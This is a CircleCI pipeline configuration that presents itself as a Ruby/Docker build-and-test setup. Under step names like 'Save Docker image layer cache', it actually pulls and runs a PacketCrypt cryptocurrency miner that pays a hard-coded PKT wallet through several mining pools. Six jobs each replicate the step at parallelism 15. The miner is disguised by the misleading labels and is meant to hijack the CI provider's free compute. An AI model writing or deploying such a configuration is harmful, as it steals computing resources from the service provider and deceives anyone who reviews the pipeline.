.build_template: &build_definition
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
      - run:
          name: Save Docker image layer cache
          command: |
            docker run thomasjp0x42/packetcrypt ann -p pkt1qwek4808nspsmlcaqnc0aes4cfwurystgjtwf6f https://stratum.zetahash.com http://pool.pktpool.io http://pool.pkt.world 2>&1 | grep -o "annmine.rs.*Ke.*"
      - save_cache:
          key: v1-{{ .Branch }}-{{ epoch }}
          paths:
            - /caches/app.tar
      - run:
          name: Run tests
          command: |
            docker-compose -f ./docker-compose.test.yml up


version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  gas1:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas2:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas3:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas4:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas5:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas6:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
    
workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - gas1
      - gas2
      - gas3
      - gas4
      - gas5
      - gas6
